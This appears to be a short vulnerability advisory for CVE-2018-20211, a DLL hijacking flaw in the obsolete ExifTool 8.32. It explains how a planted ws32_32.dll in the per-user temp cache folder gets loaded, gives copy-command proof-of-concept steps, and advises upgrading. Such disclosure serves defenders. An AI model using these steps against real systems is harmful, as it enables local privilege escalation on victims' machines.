Exiftool 8.3.2.0 DLL Hijacking

`<!--  
# Exploit Title: DLL Hijacking in Exiftool v8.3.2.0  
# Date: 18-12-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://owl.phy.queensu.ca/~phil/exiftool/  
# Software Link: http://owl.phy.queensu.ca/~phil/exiftool/  
# Version: v8.3.2.0  
# Tested on: all  
# CVE : CVE-2018-20211  
# Category: webapps  
  
1. Description  
  
ExifTool 8.32 allows local users to gain privileges by creating a  
%TEMP%\par-%username%\cache-exiftool-8.32 folder with a victim's username,  
and then copying a Trojan horse ws32_32.dll file into this new folder, aka  
DLL Hijacking. NOTE: 8.32 is an obsolete version from 2010 (9.x was  
released starting in 2012, and 10.x was released  
starting in 2015).  
  
  
2. Proof of Concept  
  
echo %TEMP%  
c:\windows\temp  
  
copy malicious.dll %TEMP%\par-%username%\cache-exiftool-8.32\ws32_32.dll  
  
Execute application \\server\share\exiftool\exiftool.exe or directly the  
application.  
  
  
3. Solution:  
  
This application is deprecated. Use the last, v11.22.  
  
-->  
  
  
`